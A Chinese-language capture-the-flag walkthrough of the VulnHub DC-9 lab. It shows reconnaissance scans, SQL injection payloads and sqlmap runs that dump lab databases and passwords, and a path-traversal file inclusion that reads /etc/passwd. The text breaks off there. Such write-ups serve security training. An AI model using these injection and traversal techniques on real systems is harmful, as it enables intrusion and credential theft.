vuInhub靶场实战系列-DC-9实战

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关。

目录

  • 免责声明
  • 前言
  • 一、环境配置
  • 二、信息收集
    • 2.1 主机发现
    • 2.2 端口扫描
    • 2.3 指纹识别
    • 2.4 目录扫描
      • 2.4.1 Nikto目录扫描
      • 2.4.2 dirsearch目录扫描
    • 2.5 漏洞发现
    • 2.5.1 页面访问
  • 三、渗透测试
    • 3.1 SQL注入
      • 3.1.1 获得数据库名称列表
      • 3.1.2 获取数据库中的表名
      • 3.1.2.1 获取数据库Staff中的表名
      • 3.1.2.2 获取数据库users中的表名
      • 3.1.3 获取表中信息
        • 3.1.3.1 获取StaffDetails(Staff数据库)表中信息
        • 3.1.3.2 获取Users(Staff数据库)表中信息
        • 3.1.3.1 获取UserDetails(users数据库)表中信息
    • 3.2 LFI包含
      • 3.2.1 登录
      • 3.2.2 文件包含漏洞
      • 3.2.3 敲门服务
    • 3.3 SSH相关
      • 3.3.1 nc开启SSH服务
      • 3.3.2 端口扫描
      • 3.3.3 hydra
        • 3.3.3.1 生成字典
        • 3.3.3.2 执行hydra爆破ssh
    • 3.4 ssh连接
      • 3.4.1 chandlerb
      • 3.4.2 joeyt
      • 3.4.3 janitor
      • 3.4.4 fredf
    • 3.5 linux系统提权
      • 3.5.1 kali生成hash密码
      • 3.5.2 将密码写入/etc/passwd
      • 3.5.3 获得flag
        • 3.5.3.1 切换admin用户
        • 3.5.3.2 查找flag文件
        • 3.5.3.3 查看flag文件
  • 渗透总结
  • 参考文章


前言

今日测试内容渗透dc-9靶机:

Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文将介绍dc-9靶机渗透测试,内容包括nmap扫描、目录扫描(nikto\dirsearch\dirb)、SQ注入、wfuzz爆破、LFI文件包含、SSH爆破(knockd\nmap\netcat\Hydra)、linux内核提权(openssl)并获得flag等内容。

Description
Back to the Top
DESCRIPTION
DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again.
But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.


一、环境配置

靶场信息

官方链接https://www.vulnhub.com/entry/dc-9,412/
发布日期2019年12月29日
靶场大小700MB
作者DCAU
系列DC
难度★★☆☆☆

渗透测试环境配置,请参考作者前面的内容,不再赘述:

vuInhub靶场实战系列-DC-2实战:https://editor.csdn.net/md/?articleId=139026849


二、信息收集

2.1 主机发现

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.6.66
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1	00:50:56:c0:00:08	VMware, Inc.
192.168.6.2	00:50:56:f5:7b:9f	VMware, Inc.
192.168.6.145	00:0c:29:c1:5e:37	VMware, Inc.
192.168.6.254	00:50:56:e9:88:8e	VMware, Inc.4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.359 seconds (108.52 hosts/sec). 4 responded

获得目标主机信息:
IP地址: 192.168.6.145
MAC地址: 00:0c:29:c1:5e:37

2.2 端口扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA dc-9 192.168.6.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 06:35 EDT
Nmap scan report for 192.168.6.145
Host is up (0.00027s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:C1:5E:37 (VMware)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds

扫描结果显示:
22端口:ssh服务(filtered过滤)
80端口:http服务

2.3 指纹识别

┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.145
WhatWeb report for http://192.168.6.145
Status    : 200 OK
Title     : Example.com - Staff Details - Welcome
IP        : 192.168.6.145
Country   : RESERVED, ZZSummary   : Apache[2.4.38], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)]Detected Plugins:
[ Apache ]The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Version      : 2.4.38 (from HTTP Server Header)Google Dorks: (3)Website     : http://httpd.apache.org/[ HTML5 ]HTML version 5, detected by the doctype declaration [ HTTPServer ]HTTP server header string. This plugin also attempts to identify the operating system from the server header. OS           : Debian LinuxString       : Apache/2.4.38 (Debian) (from server string)HTTP Headers:HTTP/1.1 200 OKDate: Sat, 01 Jun 2024 10:39:45 GMTServer: Apache/2.4.38 (Debian)Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 402Connection: closeContent-Type: text/html; charset=UTF-8

结果显示:
Apache[2.4.38], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)]

2.4 目录扫描

2.4.1 Nikto目录扫描

┌──(root㉿kali)-[/home/kali]
└─# nikto -host 192.168.6.145
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.6.145
+ Target Hostname:    192.168.6.145
+ Target Port:        80
+ Start Time:         2024-06-01 06:41:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /includes/: Directory indexing found.
+ /includes/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2024-06-01 06:42:21 (GMT-4) (38 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

2.4.2 dirsearch目录扫描

┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.6.145 -e * -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481Output File: /home/kali/reports/_192.168.6.145/_24-06-01_06-43-35.txtTarget: http://192.168.6.145/[06:43:35] Starting: 
[06:43:40] 403 -  278B  - /.ht_wsr.txt                                      
[06:43:40] 403 -  278B  - /.htaccess.sample
[06:43:40] 403 -  278B  - /.htaccess.bak1
[06:43:40] 403 -  278B  - /.htaccess.save                                   
[06:43:40] 403 -  278B  - /.htaccess_orig
[06:43:40] 403 -  278B  - /.htaccess_sc
[06:43:40] 403 -  278B  - /.htaccess.orig
[06:43:40] 403 -  278B  - /.htaccessBAK
[06:43:40] 403 -  278B  - /.html                                            
[06:43:40] 403 -  278B  - /.htm                                             
[06:43:40] 403 -  278B  - /.htaccessOLD2                                    
[06:43:40] 403 -  278B  - /.htpasswd_test                                   
[06:43:40] 403 -  278B  - /.htaccessOLD                                     
[06:43:40] 403 -  278B  - /.htaccess_extra                                  
[06:43:40] 403 -  278B  - /.htpasswds                                       
[06:43:40] 403 -  278B  - /.httr-oauth                                      
[06:43:42] 403 -  278B  - /.php                                             
[06:44:07] 200 -    0B  - /config.php                                       
[06:44:10] 301 -  312B  - /css  ->  http://192.168.6.145/css/               
[06:44:23] 200 -  407B  - /includes/                                        
[06:44:23] 301 -  317B  - /includes  ->  http://192.168.6.145/includes/     
[06:44:32] 200 -  494B  - /manage.php                                       
[06:44:54] 403 -  278B  - /server-status/                                   
[06:44:53] 403 -  278B  - /server-status                                    Task Completed

测试结束,获得一些关键信息:
http://192.168.6.145/includes/
http://192.168.6.145/manage.php

2.5 漏洞发现

2.5.1 页面访问

管理页面: http://192.168.6.145/manage.php
管理页面
网站根目录:192.168.6.145
根目录
Home页:http://192.168.6.145/index.php
Home页
display页:http://192.168.6.145/display.php
display页面
search页:http://192.168.6.145/search.php
search页

分析:
在search页输入’or 1=1 --+,点击submit写入测试payload
返回信息如下:
返回result.php
返回17条用户信息,所有此页面(http://192.168.6.145/search.php)存在SQL注入漏洞


三、渗透测试

3.1 SQL注入

3.1.1 获得数据库名称列表

┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" --dbs_____H_____ ___[)]_____ ___ ___  {1.8.3#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 07:15:05 /2024-06-01/[07:15:06] [INFO] testing connection to the target URL
[07:15:06] [INFO] checking if the target is protected by some kind of WAF/IPS
[07:15:06] [INFO] testing if the target URL content is stable
[07:15:06] [INFO] target URL content is stable
[07:15:06] [INFO] testing if POST parameter 'search' is dynamic
[07:15:07] [WARNING] POST parameter 'search' does not appear to be dynamic
[07:15:07] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[07:15:07] [INFO] testing for SQL injection on POST parameter 'search'
[07:15:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:15:07] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:15:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:15:07] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:15:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[07:15:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[07:15:07] [INFO] testing 'Generic inline queries'
[07:15:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[07:15:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[07:15:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[07:15:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:15:27] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[07:18:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[07:18:50] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[07:18:50] [INFO] target URL appears to be UNION injectable with 6 columns
[07:18:50] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: search (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWVType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:18:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:18:53] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users[07:18:53] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'[*] ending @ 07:18:53 /2024-06-01/

测试结束,获得数据库列表:
fetching database namesavailable databases [3]:
[ * ] information_schema
[ * ] Staff
[ * ] users

3.1.2 获取数据库中的表名

3.1.2.1 获取数据库Staff中的表名

┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D Staff --tables     _____H_____ ___[.]_____ ___ ___  {1.8.3#stable}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 07:31:48 /2024-06-01/[07:31:48] [INFO] resuming back-end DBMS 'mysql' 
[07:31:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWVType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:31:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:31:48] [INFO] fetching tables for database: 'Staff'
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+[07:31:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'[*] ending @ 07:31:48 /2024-06-01/

爆破Staff数据库获得2个表:
StaffDetails
Users

3.1.2.2 获取数据库users中的表名

┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D users --tables_____H_____ ___["]_____ ___ ___  {1.8.3#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 07:34:48 /2024-06-01/[07:34:48] [INFO] resuming back-end DBMS 'mysql' 
[07:34:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWVType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:34:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:34:48] [INFO] fetching tables for database: 'users'
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+[07:34:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'[*] ending @ 07:34:48 /2024-06-01/

爆破users数据获得1个表:
UserDetails

3.1.3 获取表中信息

3.1.3.1 获取StaffDetails(Staff数据库)表中信息
┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D Staff -T StaffDetails --dump_____H_____ ___[.]_____ ___ ___  {1.8.3#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 07:38:15 /2024-06-01/[07:38:16] [INFO] resuming back-end DBMS 'mysql' 
[07:38:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWVType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:38:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:38:16] [INFO] fetching columns for table 'StaffDetails' in database 'Staff'
[07:38:16] [INFO] fetching entries for table 'StaffDetails' in database 'Staff'
Database: Staff
Table: StaffDetails
[17 entries]
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| id | email                 | phone          | lastname   | reg_date            | firstname | position                      |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| 1  | marym@example.com     | 46478415155456 | Moe        | 2019-05-01 17:32:00 | Mary      | CEO                           |
| 2  | julied@example.com    | 46457131654    | Dooley     | 2019-05-01 17:32:00 | Julie     | Human Resources               |
| 3  | fredf@example.com     | 46415323       | Flintstone | 2019-05-01 17:32:00 | Fred      | Systems Administrator         |
| 4  | barneyr@example.com   | 324643564      | Rubble     | 2019-05-01 17:32:00 | Barney    | Help Desk                     |
| 5  | tomc@example.com      | 802438797      | Cat        | 2019-05-01 17:32:00 | Tom       | Driver                        |
| 6  | jerrym@example.com    | 24342654756    | Mouse      | 2019-05-01 17:32:00 | Jerry     | Stores                        |
| 7  | wilmaf@example.com    | 243457487      | Flintstone | 2019-05-01 17:32:00 | Wilma     | Accounts                      |
| 8  | bettyr@example.com    | 90239724378    | Rubble     | 2019-05-01 17:32:00 | Betty     | Junior Accounts               |
| 9  | chandlerb@example.com | 189024789      | Bing       | 2019-05-01 17:32:00 | Chandler  | President - Sales             |
| 10 | joeyt@example.com     | 232131654      | Tribbiani  | 2019-05-01 17:32:00 | Joey      | Janitor                       |
| 11 | rachelg@example.com   | 823897243978   | Green      | 2019-05-01 17:32:00 | Rachel    | Personal Assistant            |
| 12 | rossg@example.com     | 6549638203     | Geller     | 2019-05-01 17:32:00 | Ross      | Instructor                    |
| 13 | monicag@example.com   | 8092432798     | Geller     | 2019-05-01 17:32:00 | Monica    | Marketing                     |
| 14 | phoebeb@example.com   | 43289079824    | Buffay     | 2019-05-01 17:32:02 | Phoebe    | Assistant Janitor             |
| 15 | scoots@example.com    | 454786464      | McScoots   | 2019-05-01 20:16:33 | Scooter   | Resident Cat                  |
| 16 | janitor@example.com   | 65464646479741 | Trump      | 2019-12-23 03:11:39 | Donald    | Replacement Janitor           |
| 17 | janitor2@example.com  | 47836546413    | Morrison   | 2019-12-24 03:41:04 | Scott     | Assistant Replacement Janitor |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+[07:38:17] [INFO] table 'Staff.StaffDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.6.145/dump/Staff/StaffDetails.csv'
[07:38:17] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'[*] ending @ 07:38:17 /2024-06-01/

爆破信息如上图bash代码块所示,展示了所有数据库Staff中的StaffDetails表对应的所有用户信息(email,phone,lastname,firstname,position)。

3.1.3.2 获取Users(Staff数据库)表中信息
┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D Staff -T Users --dump       _____H_____ ___[)]_____ ___ ___  {1.8.3#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 07:45:38 /2024-06-01/[07:45:38] [INFO] resuming back-end DBMS 'mysql' 
[07:45:38] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWVType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:45:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:45:38] [INFO] fetching columns for table 'Users' in database 'Staff'
[07:45:38] [INFO] fetching entries for table 'Users' in database 'Staff'
[07:45:39] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[07:45:42] [INFO] writing hashes to a temporary file '/tmp/sqlmapamxv6dki591911/sqlmaphashes-btocsf9y.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[07:45:44] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> [07:45:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] [07:45:47] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[07:45:47] [INFO] starting 8 processes 
[07:46:13] [WARNING] no clear password(s) found                                                                                                                                                                                   
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password                         | Username |
+--------+----------------------------------+----------+
| 1      | 856f5de590ef37314e7c3bdf6f8a66dc | admin    |
+--------+----------------------------------+----------+[07:46:13] [INFO] table 'Staff.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.6.145/dump/Staff/Users.csv'
[07:46:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'[*] ending @ 07:46:13 /2024-06-01/

爆破信息如上图bash代码块所示,展示了所有数据库Staff中的Users表对应的用户信息(只有一条数据):

用户名(Username )密码(Password)
admin856f5de590ef37314e7c3bdf6f8a66dc(transorbital1)

Password的长度为32,应该是MD5加密。
使用在线解密网站,进行解密,得到Password的明文密码:
Password:transorbital1
md5解密

3.1.3.1 获取UserDetails(users数据库)表中信息
┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D users -T UserDetails --dump_____H_____ ___[(]_____ ___ ___  {1.8.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 08:00:17 /2024-06-01/[08:00:18] [INFO] resuming back-end DBMS 'mysql' 
[08:00:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWVType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[08:00:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[08:00:18] [INFO] fetching columns for table 'UserDetails' in database 'users'
[08:00:18] [INFO] fetching entries for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+[08:00:18] [INFO] table 'users.UserDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.6.145/dump/users/UserDetails.csv'
[08:00:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'[*] ending @ 08:00:18 /2024-06-01/

爆破得到users数据库中UserDetails表中所有用户信息,包含用户名(username )和密码(password)

3.2 LFI包含

3.2.1 登录

登录页:http://192.168.6.145/manage.php
用户名:admin
密 码:transorbital1
登录成功

3.2.2 文件包含漏洞

测试连接:http://192.168.6.145/addrecord.php?file=…/…/…/…/etc/passwd
返回数据:

root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
sys:x:3:3:sys:/dev:/usr/sbin/nologin 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/usr/sbin/nologin 
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false marym:x:1001:1001:Mary Moe:/home/marym:/bin/bash julied:x:1002:1002:Julie Dooley:/home/julied:/bin/bash fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash barneyr:x:1004:1004:Barney Rubble:/home/barneyr:/bin/bash tomc:x:1005:1005:Tom Cat:/home/tomc:/bin/bash jerrym:x:1006:1006:Jerry Mouse:/home/jerrym:/bin/bash 